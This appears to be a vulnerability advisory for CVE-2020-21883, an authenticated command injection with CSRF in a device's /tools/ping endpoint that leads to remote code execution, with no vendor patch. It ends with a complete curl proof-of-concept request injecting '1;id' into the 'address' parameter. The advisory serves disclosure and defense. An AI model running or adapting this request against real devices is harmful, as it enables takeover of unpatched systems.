CVE-2020-21883

An authenticated attacker sends a POST request to /tools/ping with a crafted 'address' parameter containing command injection payloads (e.g., `1;id`). The device does not validate a CSRF token, so an attacker can also trick an authenticated victim into opening a malicious URL, causing the victim's browser to execute the same POST request and compromise the device [ref_id=1]. This leads to remote code execution as the www-data user and complete device takeover [ref_id=1][ref_id=2].

The vulnerable endpoint is /tools/ping [ref_id=1][ref_id=2]. The 'address' POST parameter is passed unsanitized to a system-level ping command, allowing shell injection.

No patch has been published by the vendor. The advisory reports that the vendor was contacted but no response was received, and no fix has been released [ref_id=1][ref_id=2]. Remediation would require the vendor to implement input validation on the 'address' parameter to reject shell metacharacters, and to add CSRF token validation to the /tools/ping endpoint.

curl -i -s -k -X $'POST' -H $'Host: <target-ip>' -H $'User-Agent: Mozilla/5.0 (X11; Linux rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://<target-ip>/tools/ping' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 25' -H $'Connection: close' -H $'Cookie: PHPSESSID=<valid-session>' -H $'Upgrade-Insecure-Requests: 1' -b $'PHPSESSID=<valid-session>' --data-binary $'pingaction=1&address=1;id' $'http://<target-ip>/tools/ping' [ref_id=1]